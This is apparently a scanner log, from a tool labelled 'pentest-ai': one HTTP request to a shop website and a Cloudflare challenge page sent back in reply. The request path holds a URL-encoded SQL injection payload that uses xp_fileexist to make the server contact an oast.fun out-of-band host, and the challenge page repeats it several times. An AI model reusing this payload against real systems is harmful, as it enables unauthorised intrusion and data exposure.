REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0z85k6lal916lc4.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-/assets/component-price.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10001
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84785aba9a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ggpG%2FPx66pT7MDgWwKHIZn4h5hUyNPQgxu7wbqbxnq6sR1hsRXNupyESlHKN%2FtVMD06z4gk%2B5hwsmBRbVN8IahGsBzPJsZIRTRxx6yGxA0rc8jU7A7t0yClqSCPcskvs6SRxxjaDiYJYGlwFpw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84785aba9a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'Dzk_uZ9poyKYbg3DNNKQiTyZ._BWY.5BVsH7A0VBeHc-1784281165-1.2.1.1-z6HliXs1Pgg5pJEGrgOg0RV8QURLv1ajRYYIp8E45_gy3A6zj1tDe5t9rPVxyr6F',cITimeS: '1784281165',cRay: 'a1c84785aba9a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0z85k6lal916lc4.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-price.css?__cf_chl_tk=_XF8ihwSU9v4r._SPAlWj23Cad2mZdugxM4irX_BPyw-1784281165-1.0.1.1-pYHCb8uBIfiHwjwXRQEtcaQGSz1mKHZb8d3ESwXN3B8",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0z85k6lal916lc4.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-price.css?__cf_chl_f_tk=_XF8ihwSU9v4r._SPAlWj23Cad2mZdugxM4irX_BPyw-1784281165-1.0.1.1-pYHCb8uBIfiHwjwXRQEtcaQGSz1mKHZb8d3ESwXN3B8",md: 'Uf427i9mq7NWk_2XwEgZh1ri6YxDRNzSAU8EAhO8T6I-1784281165-1.2.1.1-amlOnQ8vJR9TdvkEHj_LOglRNHVA4xpP_Gtsc8FbW5W03SezKyUQVe1Lp9sS_QRuGSqpJ0Q5P0px6lr31YhpWtfBlQ.ktafrcciS4pHRtYjX0yKQz1iZznWu6dlSlizCyS.wZ1QeoMJmE3cgEm0t2yZG62o5NiM5bMnkr2Ua7Y2uk9GZq3Ff_PtdiGWPz0adwrhcYHapLWL55.dCeSQzblSxwIhvEEipaSxuTd7YQIPYw_glRwJWz6y7FY6fYDbyb2HltGXZ5czMhBTAnUXXhbs7onU8M2oHeyUaRjZKRPyCsS_s6gPk.ZmS2fv.AO0V1Mi3K4O1xaPVm.QmBrynQZwj_tAc1C33g_2LKHaoYFg6Tw9VlYsGrOQsAYpYELZvLWSWoZt.cdsm0Bo5wNRjBq6GQrE2xlAz50DwZyr2E3QmiB_kXAppE2._GSgA3Awa.y9NwpHjT7WpORzdhI3NTcngSoUDrGiXUJNWcFIb.fc9VNfDkTlJRGIJiLWvhb2XeEn4SMKjpt9fPOnzg4rJvpXnhbSzikTItgcyj7qb8u52nW5RJ64EnyEq_Eho8HpWJizRVv8xEk7fiPQrsnsjvZJpUOory1kAL7bUuX4laoEX5_grj9IjCkOgnTHNquqK8e1cdh3X2.pWExKLS_EY_ivgf1eBIFkGmwIP1qPBmDJ.rQA0ZoGRmuA8D4s849tDOinIKbLdz_O3Aeqlxqp7FjtxSBCsIWBk5cG.xF0cLkF._08bw5b8zSx_0EiN432LG7nW5.TSL.BCgQE_GOuJt2RIVEnVsfZD0oecW5xEiu3mgZouGZtHq.lY9MNKbDiXFvwQ_Jnnuo6Uh6CPXhkO9BjsMAFsUxQvUT4_fdbdFFsvVCCU2a4SZuHUgrQoch7O2IoeQ1ZJBBiSLTEDi1bH.NC8fVvPr0kRrNbRI8n5FHUN6vXWv7ke1jp5O0KEx0uNbDxZaM8XIzRaQfVdPjHDMDuYxXcO62c5ORDgk3N1tsyXOX2TNZ7VWeiG2Oo6f7sesU0wN.caah1jqGg0J3XMEj6kizVn2lTmeeb3MHG.0KMYiQRhx3pwB2SxXal_gDrCJSR00KM7gBBLUpT5CYPWDZiM1lrTVxSl55rI1WBnTn33JQQAM_EeimwGv3fGoWpYKlFlkMyuiVXSazC2Dkw3yerV8lvXuU5PJubm8JMOvlfoT..Z2uAx6E.OPgsrcMagRvu.X9lmIDDT_T2UJIET3JwPSRGicvPeGyLXITS.yCsqInoToM.5s3.WrihNqO2PKy8VmCgWEbssAQAEiUQMQYTM.mP8ZwchF0Y9YGIC_6zQQN7LwCJGnRn_Fz.uAS8cmRdn3cgGpEWBfBGh8LwonP2.LL9Pyd9klo.AgCudDknJiWNipjcLUpViVWhkJDJU',mdrd: 'YMgnerAMGuhWrltJvhCwmKd1TV9Ki8uEwB3QauBDAKM-1784281165-1.2.1.1-h_NrGnVboWmoMdlphNzII9JmcmHGHUYedQlepunErDluWPiGqtScWnAv7Kehhc9G5pVsHMJct.DrUY5OJrhcjO_aOOR5tQhGmDlu4oIok11KxxpGngIcQm3cPGEQRRBDev.OcKtbprpsH.H7mmpNxsYp9HDpUR4RaPrRe0oKfDopxQ8NGceYTa1FJIGVNnhl5Wpgnui99Pi3DsItxVnORcg_kb8zd3wN5SZUi1yChVtLGwaspVpK9au_81NLaREh',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84785aba9a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0z85k6lal916lc4.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-price.css?__cf_chl_rt_tk=_XF8ihwSU9v4r._SPAlWj23Cad2mZdugxM4irX_BPyw-1784281165-1.0.1.1-pYHCb8uBIfiHwjwXRQEtcaQGSz1mKHZb8d3ESwXN3B8"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
